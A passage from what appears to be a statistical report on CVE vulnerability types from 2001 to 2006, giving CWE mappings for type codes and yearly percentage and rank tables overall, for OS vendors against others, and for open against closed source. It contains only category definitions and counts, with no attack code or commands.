value in one format/representation is improperly handled when it is used as if it were another format/representation. Overlaps integer overflows and array index errors. Type: spoof CWE: CWE-290, CWE-350, CWE-347, CWE-345, CWE-247, CWE-292, CWE-291 Description: Product is vulnerable to spoofing attacks, generally by not properly verifying authenticity. Type: sql-inject CWE: CWE-89 Description: SQL injection vulnerability Type: type-check CWE: unknown Description: Product incorrectly identifies the type of an input parameter or file, then dispatches the wrong "executable" (possibly itself) to process the input, or otherwise misrepresents the input in a security-critical way. Type: unk CWE: none Description: Unknown vulnerability; report is too vague to determine type of issue. Type: upload CWE: CWE-434 Description: Product does not restrict the extensions for files that can be uploaded to the web server, leading to code execution if executable extensions are used in filenames, such as .asp, .php, and .shtml. Type: webroot CWE: CWE-219, CWE-433 Description: Storage of sensitive data under web document root with insufficient access control. Type: XSS CWE: CWE-79, CWE-80, CWE-87, CWE-85, CWE-82, CWE-81, CWE-83, CWE-84 Description: Cross-site scripting (aka XSS) ==================================== ===== Table 1: Overall Results ===== ==================================== TOTAL 2001 2002 2003 2004 2005 2006 (16192) (1434) (2138) (1173) (2534) (4538) (4375) ---------- ---------- ---------- ---------- ---------- ---------- ---------- [ 1] XSS 13.9% ( 1) 02.2% (11) 08.7% ( 2) 07.5% ( 2) 10.9% ( 2) 16.0% ( 1) 21.5% ( 1) 2247 32 187 88 276 725 939 [ 2] buf 13.3% ( 2) 19.5% ( 1) 20.3% ( 1) 22.5% ( 1) 15.4% ( 1) 09.8% ( 3) 07.9% ( 4) 2156 279 433 264 391 445 344 [ 3] sql-inject 08.7% ( 3) 00.4% (27) 01.8% (12) 03.0% ( 4) 05.5% ( 3) 12.9% ( 2) 14.0% ( 2) 1416 6 38 35 140 584 613 [ 4] dot 04.7% ( 4) 08.9% ( 2) 05.1% ( 3) 02.9% ( 5) 04.1% ( 4) 04.3% ( 4) 04.4% ( 5) 764 127 110 34 104 195 194 [ 5] php-include 03.5% ( 5) 00.1% (31) 00.3% (30) 00.8% (15) 01.4% (10) 02.1% ( 6) 09.5% ( 3) 561 1 6 9 36 95 414 [ 6] infoleak 03.3% ( 6) 02.6% ( 9) 04.2% ( 5) 02.6% ( 7) 03.7% ( 5) 03.9% ( 5) 02.6% ( 6) 540 37 89 30 95 175 114 [ 7] dos-malform 02.9% ( 7) 04.8% ( 3) 05.1% ( 4) 02.5% ( 8) 03.4% ( 6) 01.8% ( 8) 02.0% ( 7) 463 69 110 29 87 82 86 [ 8] link 02.0% ( 8) 04.5% ( 4) 02.1% ( 9) 03.5% ( 3) 02.8% ( 7) 01.9% ( 7) 00.5% (16) 329 64 45 41 72 87 20 [ 9] format-string 01.8% ( 9) 03.2% ( 7) 01.8% (11) 02.7% ( 6) 02.4% ( 8) 01.7% ( 9) 01.0% (10) 296 46 39 32 61 76 42 [10] crypt 01.6% (10) 03.8% ( 6) 02.7% ( 6) 01.5% ( 9) 00.9% (16) 01.5% (10) 00.9% (11) 261 55 58 18 22 68 40 [11] priv 01.4% (11) 02.5% (10) 02.2% ( 8) 01.0% (12) 01.3% (11) 01.5% (11) 00.9% (12) 233 36 46 12 32 67 40 [12] metachar 01.3% (12) 03.8% ( 5) 02.6% ( 7) 00.7% (17) 01.0% (14) 01.3% (12) 00.3% (20) 218 55 56 8 26 59 14 [13] perm 01.3% (13) 02.7% ( 8) 01.8% (10) 01.3% (11) 00.9% (15) 01.1% (13) 01.1% ( 9) 215 39 39 15 24 48 50 [14] int-overflow 01.0% (14) 00.1% (32) 00.4% (22) 01.4% (10) 01.9% ( 9) 00.8% (15) 01.2% ( 8) 160 1 8 16 47 36 52 [15] dos-flood 00.8% (15) 02.0% (12) 01.7% (13) 00.5% (19) 01.2% (12) 00.2% (27) 00.4% (17) 131 29 36 6 31 10 19 [16] pass 00.8% (16) 01.1% (18) 01.3% (14) 00.2% (28) 01.1% (13) 00.8% (14) 00.4% (18) 125 16 27 2 28 36 16 [17] auth 00.8% (17) 01.5% (13) 01.3% (15) 00.5% (20) 00.7% (17) 00.5% (19) 00.7% (14) 124 22 27 6 17 21 31 [18] webroot 00.5% (18) 00.1% (29) 00.2% (32) 00.3% (24) 00.2% (30) 00.7% (16) 00.9% (13) 88 2 5 3 5 33 40 [19] form-field 00.5% (19) 00.7% (24) 00.8% (17) 00.5% (21) 00.2% (27) 00.4% (20) 00.5% (15) 81 10 17 6 6 19 23 [20] relpath 00.4% (20) 00.8% (22) 00.3% (29) 00.9% (14) 00.6% (18) 00.3% (22) 00.3% (21) 71 12 6 10 14 15 14 [21] race 00.4% (21) 00.5% (26) 00.4% (24) 00.6% (18) 00.4% (21) 00.6% (17) 00.3% (24) 69 7 8 7 10 26 11 [22] memleak 00.4% (22) 01.1% (17) 00.2% (31) 00.4% (22) 00.5% (19) 00.3% (23) 00.2% (27) 61 16 5 5 13 15 7 [23] msdos-device 00.4% (23) 01.0% (20) 00.6% (19) 00.9% (13) 00.2% (23) 00.2% (28) 00.0% (32) 57 15 13 11 6 10 2 [24] crlf 00.3% (24) 00.0% N/A 00.2% (33) 00.1% (30) 00.5% (20) 00.4% (21) 00.3% (19) 49 0 4 1 13 17 14 [25] default 00.3% (26) 01.1% (16) 00.7% (18) 00.1% (33) 00.2% (26) 00.1% (33) 00.1% (29) 48 16 16 1 6 3 6 [26] spoof 00.3% (25) 01.0% (19) 00.3% (28) 00.1% (32) 00.1% (33) 00.2% (26) 00.3% (25) 48 15 7 1 3 11 11 [27] sandbox 00.3% (27) 01.2% (15) 01.0% (16) 00.0% N/A 00.2% (29) 00.0% (34) 00.0% N/A 46 17 22 0 5 2 0 [28] rand 00.3% (28) 01.2% (14) 00.6% (20) 00.3% (25) 00.2% (32) 00.0% (35) 00.2% (26) 45 17 12 3 4 2 7 [29] upload 00.3% (29) 00.0% N/A 00.0% (36) 00.1% (29) 00.2% (24) 00.5% (18) 00.3% (22) 43 0 1 1 6 22 13 [30] signedness 00.2% (30) 00.1% (30) 00.4% (23) 00.8% (16) 00.2% (25) 00.3% (24) 00.0% (34) 38 1 8 9 6 12 2 [31] dos-release 00.2% (31) 00.9% (21) 00.5% (21) 00.2% (27) 00.2% (31) 00.0% N/A 00.0% N/A 30 13 10 2 5 0 0 [32] CF 00.2% (32) 00.7% (23) 00.3% (27) 00.2% (26) 00.0% N/A 00.1% (31) 00.1% (28) 29 10 7 2 0 4 6 [33] eval-inject 00.2% (33) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% (34) 00.2% (25) 00.3% (23) 25 0 0 0 1 11 13 [34] design 00.1% (34) 00.6% (25) 00.4% (26) 00.1% (31) 00.0% (35) 00.1% (32) 00.0% (31) 23 8 8 1 1 3 2 [35] double-free 00.1% (35) 00.0% N/A 00.1% (34) 00.3% (23) 00.2% (22) 00.1% (30) 00.1% (30) 21 0 2 4 6 5 4 [36] CSRF 00.1% (37) 00.0% N/A 00.0% (35) 00.0% N/A 00.2% (28) 00.2% (29) 00.0% (33) 16 0 1 0 5 8 2 [37] type-check 00.1% (36) 00.4% (28) 00.4% (25) 00.0% N/A 00.0% N/A 00.0% (36) 00.0% (35) 16 6 8 0 0 1 1 ------------------------- UNKNOWN/UNSPECIFIED ITEMS ------------------------- n/a unk 09.0% N/A 07.9% N/A 07.1% N/A 07.0% N/A 08.2% N/A 08.9% N/A 11.5% N/A 1460 114 151 82 209 402 502 n/a other 15.2% N/A 16.7% N/A 19.0% N/A 11.8% N/A 17.2% N/A 13.1% N/A 14.9% N/A 2468 239 407 139 435 595 653 n/a not-specified 06.9% N/A 00.1% N/A 03.1% N/A 20.5% N/A 11.3% N/A 11.3% N/A 00.3% N/A 1121 2 66 240 286 513 14 =============================== ===== Table 2: OS Vendors ===== =============================== TOTAL 2001 2002 2003 2004 2005 2006 (4418) ( 443) ( 660) ( 527) ( 736) (1199) ( 853) ---------- ---------- ---------- ---------- ---------- ---------- ---------- [ 1] buf 20.0% ( 1) 21.0% ( 1) 26.8% ( 1) 24.9% ( 1) 20.4% ( 1) 16.2% ( 1) 16.1% ( 1) 882 93 177 131 150 194 137 [ 2] link 04.0% ( 2) 07.4% ( 2) 03.3% ( 4) 04.0% ( 2) 05.2% ( 2) 04.0% ( 3) 01.8% ( 5) 177 33 22 21 38 48 15 [ 3] dos-malform 03.7% ( 3) 05.6% ( 3) 06.1% ( 2) 02.7% ( 4) 04.5% ( 4) 01.8% ( 7) 03.3% ( 4) 162 25 40 14 33 22 28 [ 4] XSS 03.4% ( 4) 01.6% (12) 04.4% ( 3) 03.0% ( 3) 01.4% ( 7) 04.2% ( 2) 04.7% ( 3) 152 7 29 16 10 50 40 [ 5] int-overflow 02.7% ( 5) 00.0% N/A 01.2% (12) 02.3% ( 6) 04.6% ( 3) 02.1% ( 6) 04.7% ( 2) 119 0 8 12 34 25 40 [ 6] format-string 02.4% ( 6) 05.2% ( 4) 01.5% (10) 02.3% ( 5) 02.6% ( 5) 02.4% ( 5) 01.6% ( 7) 107 23 10 12 19 29 14 [ 7] priv 02.0% ( 7) 04.1% ( 5) 02.3% ( 6) 00.8% (13) 00.8% (14) 02.6% ( 4) 01.6% ( 6) 88 18 15 4 6 31 14 [ 8] perm 01.8% ( 8) 04.1% ( 6) 02.1% ( 7) 01.1% (11) 01.1% (10) 01.7% ( 8) 01.4% ( 9) 78 18 14 6 8 20 12 [ 9] dot 01.4% ( 9) 01.6% (13) 01.5% ( 9) 01.1% ( 8) 01.6% ( 6) 01.3% (12) 01.6% ( 8) 64 7 10 6 12 15 14 [10] metachar 01.2% (10) 02.0% ( 9) 02.6% ( 5) 00.8% (16) 00.7% (17) 01.3% (11) 00.4% (19) 53 9 17 4 5 15 3 [11] infoleak 01.2% (11) 00.9% (20) 01.2% (13) 01.1% ( 9) 01.1% ( 9) 01.3% (10) 01.2% (10) 52 4 8 6 8 16 10 [12] race 01.0% (12) 01.1% (17) 00.9% (15) 00.4% (19) 01.0% (11) 01.6% ( 9) 00.7% (13) 45 5 6 2 7 19 6 [13] memleak 00.8% (13) 02.0% (10) 00.6% (19) 00.8% (14) 01.0% (12) 00.9% (14) 00.2% (23) 37 9 4 4 7 11 2 [14] sql-inject 00.8% (14) 00.2% (27) 00.6% (21) 01.1% (10) 00.7% (16) 00.9% (13) 00.9% (11) 35 1 4 6 5 11 8 [15] crypt 00.8% (15) 01.6% (14) 01.4% (11) 01.1% ( 7) 00.4% (18) 00.4% (18) 00.5% (16) 34 7 9 6 3 5 4 [16] sandbox 00.7% (16) 02.7% ( 7) 02.1% ( 8) 00.0% N/A 00.1% (23) 00.2% (28) 00.0% N/A 29 12 14 0 1 2 0 [17] relpath 00.6% (18) 01.6% (11) 00.3% (28) 00.4% (18) 01.1% ( 8) 00.3% (27) 00.7% (14) 28 7 2 2 8 3 6 [18] dos-flood 00.6% (17) 02.5% ( 8) 00.6% (20) 00.2% (22) 00.3% (20) 00.3% (25) 00.8% (12) 28 11 4 1 2 3 7 [19] auth 00.5% (20) 01.4% (15) 01.1% (14) 00.6% (17) 00.3% (21) 00.3% (21) 00.2% (24) 24 6 7 3 2 4 2 [20] signedness 00.5% (19) 00.2% (24) 00.9% (16) 00.9% (12) 00.4% (19) 00.6% (15) 00.2% (25) 24 1 6 5 3 7 2 [21] pass 00.5% (21) 00.2% (25) 00.8% (17) 00.2% (20) 00.8% (15) 00.3% (24) 00.5% (15) 21 1 5 1 6 4 4 [22] double-free 00.4% (22) 00.0% N/A 00.3% (29) 00.8% (15) 00.8% (13) 00.3% (20) 00.4% (18) 19 0 2 4 6 4 3 [23] rand 00.3% (23) 01.4% (16) 00.5% (22) 00.2% (27) 00.1% (24) 00.0% N/A 00.2% (27) 13 6 3 1 1 0 2 [24] crlf 00.2% (25) 00.0% N/A 00.5% (23) 00.2% (25) 00.0% N/A 00.4% (17) 00.2% (20) 11 0 3 1 0 5 2 [25] spoof 00.2% (24) 00.2% (26) 00.3% (26) 00.0% N/A 00.0% N/A 00.3% (23) 00.5% (17) 11 1 2 0 0 4 4 [26] form-field 00.2% (26) 00.5% (22) 00.3% (27) 00.2% (21) 00.0% N/A 00.4% (16) 00.0% N/A 10 2 2 1 0 5 0 [27] default 00.2% (27) 00.2% (28) 00.5% (24) 00.0% N/A 00.1% (22) 00.3% (26) 00.2% (21) 10 1 3 0 1 3 2 [28] type-check 00.2% (28) 00.7% (21) 00.6% (18) 00.0% N/A 00.0% N/A 00.1% (30) 00.0% N/A 8 3 4 0 0 1 0 [29] CF 00.2% (29) 00.9% (18) 00.2% (31) 00.2% (26) 00.0% N/A 00.0% N/A 00.1% (29) 7 4 1 1 0 0 1 [30] dos-release 00.2% (30) 00.9% (19) 00.3% (25) 00.2% (23) 00.0% N/A 00.0% N/A 00.0% N/A 7 4 2 1 0 0 0 [31] php-include 00.1% (31) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.3% (19) 00.2% (26) 6 0 0 0 0 4 2 [32] eval-inject 00.1% (32) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.3% (22) 00.2% (22) 6 0 0 0 0 4 2 [33] design 00.1% (33) 00.2% (23) 00.3% (30) 00.2% (24) 00.0% N/A 00.1% (31) 00.0% N/A 5 1 2 1 0 1 0 [34] webroot 00.0% (35) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (28) 1 0 0 0 0 0 1 [35] upload 00.0% (36) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (32) 00.0% N/A 1 0 0 0 0 1 0 [36] CSRF 00.0% (34) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (29) 00.0% N/A 1 0 0 0 0 1 0 ------------------------- UNKNOWN/UNSPECIFIED ITEMS ------------------------- n/a unk 16.0% N/A 12.4% N/A 12.6% N/A 10.4% N/A 12.2% N/A 16.1% N/A 27.2% N/A 708 55 83 55 90 193 232 n/a other 16.4% N/A 15.3% N/A 15.6% N/A 12.0% N/A 12.2% N/A 14.4% N/A 26.6% N/A 724 68 103 63 90 173 227 n/a not-specified 14.3% N/A 00.2% N/A 05.9% N/A 26.0% N/A 24.6% N/A 22.2% N/A 00.8% N/A 631 1 39 137 181 266 7 ========================================== ===== Table 3: OS Vendors vs. Others ===== ========================================== TOTAL 2001 2002 2003 2004 2005 2006 ---------- ---------- ---------- ---------- ---------- ---------- ---------- OS-ven 4418 443 660 527 736 1199 853 Other 11774 991 1478 646 1798 3339 3522 ---------- ---------- ---------- ---------- ---------- ---------- ---------- [ 1] XSS 03.4% ( 4) 01.6% (13) 04.4% ( 3) 03.0% ( 3) 01.4% ( 7) 04.2% ( 2) 04.7% ( 2) 152 7 29 16 10 50 40 **** 17.8% ( 1) 02.5% ( 8) 10.7% ( 2) 11.1% ( 2) 14.8% ( 1) 20.2% ( 1) 25.5% ( 1) 2095 25 158 72 266 675 899 [ 2] buf 20.0% ( 1) 21.0% ( 1) 26.8% ( 1) 24.9% ( 1) 20.4% ( 1) 16.2% ( 1) 16.1% ( 1) 882 93 177 131 150 194 137 **** 10.8% ( 3) 18.8% ( 1) 17.3% ( 1) 20.6% ( 1) 13.4% ( 2) 07.5% ( 3) 05.9% ( 4) 1274 186 256 133 241 251 207 [ 3] sql-inject 00.8% (14) 00.2% (27) 00.6% (19) 01.1% ( 8) 00.7% (16) 00.9% (13) 00.9% (11) 35 1 4 6 5 11 8 **** 11.7% ( 2) 00.5% (26) 02.3% ( 8) 04.5% ( 3) 07.5% ( 3) 17.2% ( 2) 17.2% ( 2) 1381 5 34 29 135 573 605 [ 4] dot 01.4% ( 9) 01.6% (14) 01.5% ( 9) 01.1% (10) 01.6% ( 6) 01.3% (11) 01.6% ( 8) 64 7 10 6 12 15 14 **** 05.9% ( 4) 12.1% ( 2) 06.8% ( 3) 04.3% ( 4) 05.1% ( 4) 05.4% ( 4) 05.1% ( 5) 700 120 100 28 92 180 180 [ 5] php-include 00.1% (32) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.3% (19) 00.2% (27) 6 0 0 0 0 4 2 **** 04.7% ( 5) 00.1% (30) 00.4% (22) 01.4% (11) 02.0% ( 8) 02.7% ( 6) 11.7% ( 3) 555 1 6 9 36 91 412 [ 6] infoleak 01.2% (11) 00.9% (20) 01.2% (13) 01.1% (11) 01.1% ( 9) 01.3% (10) 01.2% (10) 52 4 8 6 8 16 10 **** 04.1% ( 6) 03.3% ( 6) 05.5% ( 4) 03.7% ( 5) 04.8% ( 5) 04.8% ( 5) 03.0% ( 6) 488 33 81 24 87 159 104 [ 7] dos-malform 03.7% ( 3) 05.6% ( 3) 06.1% ( 2) 02.7% ( 4) 04.5% ( 4) 01.8% ( 7) 03.3% ( 4) 162 25 40 14 33 22 28 **** 02.6% ( 7) 04.4% ( 5) 04.7% ( 5) 02.3% ( 8) 03.0% ( 6) 01.8% ( 8) 01.6% ( 7) 301 44 70 15 54 60 58 [ 8] link 04.0% ( 2) 07.4% ( 2) 03.3% ( 4) 04.0% ( 2) 05.2% ( 2) 04.0% ( 3) 01.8% ( 5) 177 33 22 21 38 48 15 **** 01.3% (11) 03.1% ( 7) 01.6% (13) 03.1% ( 7) 01.9% ( 9) 01.2% (11) 00.1% (25) 152 31 23 20 34 39 5 [ 9] format-string 02.4% ( 6) 05.2% ( 4) 01.5% (10) 02.3% ( 6) 02.6% ( 5) 02.4% ( 5) 01.6% ( 6) 107 23 10 12 19 29 14 **** 01.6% ( 9) 02.3% ( 9) 02.0% (11) 03.1% ( 6) 02.3% ( 7) 01.4% ( 9) 00.8% (12) 189 23 29 20 42 47 28 [10] crypt 00.8% (15) 01.6% (12) 01.4% (11) 01.1% ( 9) 00.4% (19) 00.4% (16) 00.5% (15) 34 7 9 6 3 5 4 **** 01.9% ( 8) 04.8% ( 3) 03.3% ( 6) 01.9% ( 9) 01.1% (14) 01.9% ( 7) 01.0% (10) 227 48 49 12 19 63 36 [11] priv 02.0% ( 7) 04.1% ( 5) 02.3% ( 6) 00.8% (16) 00.8% (13) 02.6% ( 4) 01.6% ( 7) 88 18 15 4 6 31 14 **** 01.2% (12) 01.8% (12) 02.1% (10) 01.2% (14) 01.4% (11) 01.1% (12) 00.7% (13) 145 18 31 8 26 36 26 [12] metachar 01.2% (10) 02.0% (10) 02.6% ( 5) 00.8% (15) 00.7% (17) 01.3% (12) 00.4% (19) 53 9 17 4 5 15 3 **** 01.4% (10) 04.6% ( 4) 02.6% ( 7) 00.6% (20) 01.2% (13) 01.3% (10) 00.3% (21) 165 46 39 4 21 44 11 [13] perm 01.8% ( 8) 04.1% ( 6) 02.1% ( 7) 01.1% ( 7) 01.1% (10) 01.7% ( 8) 01.4% ( 9) 78 18 14 6 8 20 12 **** 01.2% (13) 02.1% (10) 01.7% (12) 01.4% (12) 00.9% (15) 00.8% (15) 01.1% ( 9) 137 21 25 9 16 28 38 [14] int-overflow 02.7% ( 5) 00.0% N/A 01.2% (12) 02.3% ( 5) 04.6% ( 3) 02.1% ( 6) 04.7% ( 3) 119 0 8 12 34 25 40 **** 00.3% (22) 00.1% (31) 00.0% N/A 00.6% (18) 00.7% (17) 00.3% (21) 00.3% (17) 41 1 0 4 13 11 12 [15] dos-flood 00.6% (18) 02.5% ( 8) 00.6% (18) 00.2% (27) 00.3% (21) 00.3% (26) 00.8% (12) 28 11 4 1 2 3 7 **** 00.9% (15) 01.8% (11) 02.2% ( 9) 00.8% (17) 01.6% (10) 00.2% (23) 00.3% (18) 103 18 32 5 29 7 12 [16] pass 00.5% (21) 00.2% (25) 00.8% (17) 00.2% (26) 00.8% (15) 00.3% (20) 00.5% (17) 21 1 5 1 6 4 4 **** 00.9% (14) 01.5% (16) 01.5% (14) 00.2% (27) 01.2% (12) 01.0% (14) 00.3% (16) 104 15 22 1 22 32 12 [17] auth 00.5% (20) 01.4% (15) 01.1% (14) 00.6% (17) 00.3% (20) 00.3% (23) 00.2% (23) 24 6 7 3 2 4 2 **** 00.8% (16) 01.6% (13) 01.4% (15) 00.5% (22) 00.8% (16) 00.5% (17) 00.8% (11) 100 16 20 3 15 17 29 [18] webroot 00.0% (35) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (28) 1 0 0 0 0 0 1 **** 00.7% (17) 00.2% (28) 00.3% (26) 00.5% (21) 00.3% (26) 01.0% (13) 01.1% ( 8) 87 2 5 3 5 33 39 [19] form-field 00.2% (27) 00.5% (22) 00.3% (26) 00.2% (21) 00.0% N/A 00.4% (18) 00.0% N/A 10 2 2 1 0 5 0 **** 00.6% (18) 00.8% (20) 01.0% (16) 00.8% (15) 00.3% (23) 00.4% (18) 00.7% (14) 71 8 15 5 6 14 23 [20] relpath 00.6% (17) 01.6% (11) 00.3% (25) 00.4% (19) 01.1% ( 8) 00.3% (27) 00.7% (13) 28 7 2 2 8 3 6 **** 00.4% (20) 00.5% (25) 00.3% (27) 01.2% (13) 00.3% (22) 00.4% (19) 00.2% (22) 43 5 4 8 6 12 8 [21] race 01.0% (12) 01.1% (17) 00.9% (16) 00.4% (18) 01.0% (12) 01.6% ( 9) 00.7% (14) 45 5 6 2 7 19 6 **** 00.2% (27) 00.2% (29) 00.1% (29) 00.8% (16) 00.2% (30) 00.2% (27) 00.1% (24) 24 2 2 5 3 7 5 [22] memleak 00.8% (13) 02.0% ( 9) 00.6% (20) 00.8% (13) 01.0% (11) 00.9% (14) 00.2% (25) 37 9 4 4 7 11 2 **** 00.2% (28) 00.7% (22) 00.1% (33) 00.2% (29) 00.3% (19) 00.1% (30) 00.1% (26) 24 7 1 1 6 4 5 [23] msdos-device 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 0 0 0 0 0 0 0 **** 00.5% (19) 01.5% (15) 00.9% (17) 01.7% (10) 00.3% (21) 00.3% (22) 00.1% (31) 57 15 13 11 6 10 2 [24] crlf 00.2% (24) 00.0% N/A 00.5% (23) 00.2% (25) 00.0% N/A 00.4% (17) 00.2% (24) 11 0 3 1 0 5 2 **** 00.3% (23) 00.0% N/A 00.1% (34) 00.0% N/A 00.7% (18) 00.4% (20) 00.3% (19) 38 0 1 0 13 12 12 [25] spoof 00.2% (25) 00.2% (28) 00.3% (29) 00.0% N/A 00.0% N/A 00.3% (21) 00.5% (16) 11 1 2 0 0 4 4 **** 00.3% (25) 01.4% (17) 00.3% (25) 00.2% (28) 00.2% (29) 00.2% (25) 00.2% (23) 37 14 5 1 3 7 7 [26] default 00.2% (26) 00.2% (26) 00.5% (24) 00.0% N/A 00.1% (22) 00.3% (25) 00.2% (26) 10 1 3 0 1 3 2 **** 00.3% (24) 01.5% (14) 00.9% (18) 00.2% (26) 00.3% (27) 00.0% N/A 00.1% (29) 38 15 13 1 5 0 4 [27] sandbox 00.7% (16) 02.7% ( 7) 02.1% ( 8) 00.0% N/A 00.1% (24) 00.2% (28) 00.0% N/A 29 12 14 0 1 2 0 **** 00.1% (33) 00.5% (24) 00.5% (20) 00.0% N/A 00.2% (28) 00.0% N/A 00.0% N/A 17 5 8 0 4 0 0 [28] rand 00.3% (23) 01.4% (16) 00.5% (22) 00.2% (23) 00.1% (23) 00.0% N/A 00.2% (22) 13 6 3 1 1 0 2 **** 00.3% (26) 01.1% (18) 00.6% (19) 00.3% (23) 00.2% (32) 00.1% (32) 00.1% (28) 32 11 9 2 3 2 5 [29] upload 00.0% (34) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (32) 00.0% N/A 1 0 0 0 0 1 0 **** 00.4% (21) 00.0% N/A 00.1% (32) 00.2% (30) 00.3% (20) 00.6% (16) 00.4% (15) 42 0 1 1 6 21 13 [30] signedness 00.5% (19) 00.2% (24) 00.9% (15) 00.9% (12) 00.4% (18) 00.6% (15) 00.2% (20) 24 1 6 5 3 7 2 **** 00.1% (35) 00.0% N/A 00.1% (30) 00.6% (19) 00.2% (31) 00.1% (28) 00.0% N/A 14 0 2 4 3 5 0 [31] dos-release 00.2% (29) 00.9% (19) 00.3% (30) 00.2% (20) 00.0% N/A 00.0% N/A 00.0% N/A 7 4 2 1 0 0 0 **** 00.2% (29) 00.9% (19) 00.5% (21) 00.2% (25) 00.3% (25) 00.0% N/A 00.0% N/A 23 9 8 1 5 0 0 [32] CF 00.2% (30) 00.9% (18) 00.2% (31) 00.2% (24) 00.0% N/A 00.0% N/A 00.1% (29) 7 4 1 1 0 0 1 **** 00.2% (30) 00.6% (23) 00.4% (23) 00.2% (24) 00.0% N/A 00.1% (29) 00.1% (27) 22 6 6 1 0 4 5 [33] eval-inject 00.1% (31) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.3% (22) 00.2% (21) 6 0 0 0 0 4 2 **** 00.2% (31) 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (34) 00.2% (26) 00.3% (20) 19 0 0 0 1 7 11 [34] design 00.1% (33) 00.2% (23) 00.3% (27) 00.2% (22) 00.0% N/A 00.1% (30) 00.0% N/A 5 1 2 1 0 1 0 **** 00.2% (32) 00.7% (21) 00.4% (24) 00.0% N/A 00.1% (33) 00.1% (31) 00.1% (32) 18 7 6 0 1 2 2 [35] double-free 00.4% (22) 00.0% N/A 00.3% (28) 00.8% (14) 00.8% (14) 00.3% (24) 00.4% (18) 19 0 2 4 6 4 3 **** 00.0% (37) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.0% (33) 00.0% (33) 2 0 0 0 0 1 1 [36] type-check 00.2% (28) 00.7% (21) 00.6% (21) 00.0% N/A 00.0% N/A 00.1% (31) 00.0% N/A 8 3 4 0 0 1 0 **** 00.1% (36) 00.3% (27) 00.3% (28) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% (34) 8 3 4 0 0 0 1 [37] CSRF 00.0% (36) 00.0% N/A 00.0% N/A 00.0% N/A 00.0% N/A 00.1% (29) 00.0% N/A 1 0 0 0 0 1 0 **** 00.1% (34) 00.0% N/A 00.1% (31) 00.0% N/A 00.3% (24) 00.2% (24) 00.1% (30) 15 0 1 0 5 7 2 ------------------------- UNKNOWN/UNSPECIFIED ITEMS ------------------------- n/a unk 16.0% N/A 12.4% N/A 12.6% N/A 10.4% N/A 12.2% N/A 16.1% N/A 27.2% N/A 708 55 83 55 90 193 232 **** 06.4% N/A 06.0% N/A 04.6% N/A 04.2% N/A 06.6% N/A 06.3% N/A 07.7% N/A 752 59 68 27 119 209 270 n/a other 16.4% N/A 15.3% N/A 15.6% N/A 12.0% N/A 12.2% N/A 14.4% N/A 26.6% N/A 724 68 103 63 90 173 227 **** 14.8% N/A 17.3% N/A 20.6% N/A 11.8% N/A 19.2% N/A 12.6% N/A 12.1% N/A 1744 171 304 76 345 422 426 n/a not-specified 14.3% N/A 00.2% N/A 05.9% N/A 26.0% N/A 24.6% N/A 22.2% N/A 00.8% N/A 631 1 39 137 181 266 7 **** 04.2% N/A 00.1% N/A 01.8% N/A 15.9% N/A 05.8% N/A 07.4% N/A 00.2% N/A 490 1 27 103 105 247 7 ================================================== ===== Table 4: Open and Closed Source (OS vendors) ================================================== TOTAL 2001 2002 2003 2004 2005 2006 ---------- ---------- ---------- ---------- ---------- ---------- ---------- [ 1] buf 19.7% ( 1) 20.3% ( 1) 24.6% ( 1) 25.0% ( 1) 24.5% ( 1) 14.6% ( 1) 17.1% ( 1) **** 20.4% ( 1) 20.3% ( 1) 27.7% ( 1) 26.1% ( 1) 15.3% ( 1) 18.5% ( 1) 16.3% ( 1) [ 2] link 06.4% ( 2) 14.0% ( 2) 04.8% ( 3) 04.9% ( 2) 08.6% ( 2) 06.1% ( 2) 02.4% ( 5) **** 01.6% ( 6) 01.0% (17) 01.8% ( 9) 03.0% ( 2) 01.9% ( 5) 00.8% ( 7) 01.6% ( 6) [ 3] dos-malform 02.8% ( 5) 02.7% ( 7) 04.4% ( 4) 02.6% ( 6) 03.5% ( 5) 01.7% ( 8) 03.3% ( 4) **** 05.3% ( 2) 09.2% ( 2) 08.1% ( 2) 02.5% ( 3) 07.3% ( 2) 02.1% ( 3) 03.9% ( 3) [ 4] XSS 04.6% ( 3) 02.7% ( 8) 05.9% ( 2) 03.0% ( 5) 01.4% (10) 05.5% ( 3) 07.1% ( 2) **** 02.3% ( 3) 00.5% (22) 03.6% ( 4) 02.5% ( 4) 00.8% ( 8) 02.1% ( 4) 03.2% ( 4) [ 5] format-string 04.0% ( 4) 08.6% ( 3) 02.9% ( 6) 03.0% ( 4) 04.9% ( 3) 03.7% ( 4) 02.4% ( 6) **** 00.8% (16) 01.4% (13) 00.6% (17) 02.0% ( 5) 00.4% (18) 00.8% (10) 00.3% (17) [ 6] int-overflow 02.6% ( 6) 00.0% N/A 02.2% ( 7) 03.4% ( 3) 04.0% ( 4) 02.2% ( 7) 03.5% ( 3) **** 01.7% ( 5) 00.0% N/A 00.0% N/A 01.0% ( 7) 03.4% ( 3) 00.8% ( 8) 04.2% ( 2) [ 7] priv 02.3% ( 7) 05.4% ( 4) 01.8% ( 8) 01.5% (12) 01.2% (11) 02.3% ( 5) 02.2% ( 7) **** 01.8% ( 4) 01.9% ( 8) 03.0% ( 6) 00.0% N/A 00.4% (16) 03.4% ( 2) 00.8% (13) [ 8] perm 02.2% ( 8) 05.4% ( 5) 01.1% (13) 01.9% ( 8) 01.7% ( 7) 02.3% ( 6) 01.4% ( 9) **** 01.6% ( 7) 02.4% ( 6) 03.3% ( 5) 00.5% (11) 00.4% (12) 00.8% (12) 01.8% ( 5) [ 9] dot 01.5% (10) 00.5% (18) 01.8% ( 9) 01.1% (15) 02.0% ( 6) 01.4% (12) 01.6% ( 8) **** 01.2% (10) 01.9% (10) 00.9% (13) 01.0% ( 9) 01.5% ( 7) 00.5% (18) 01.6% ( 7) [10] infoleak 01.1% (13) 00.5% (19) 01.5% (12) 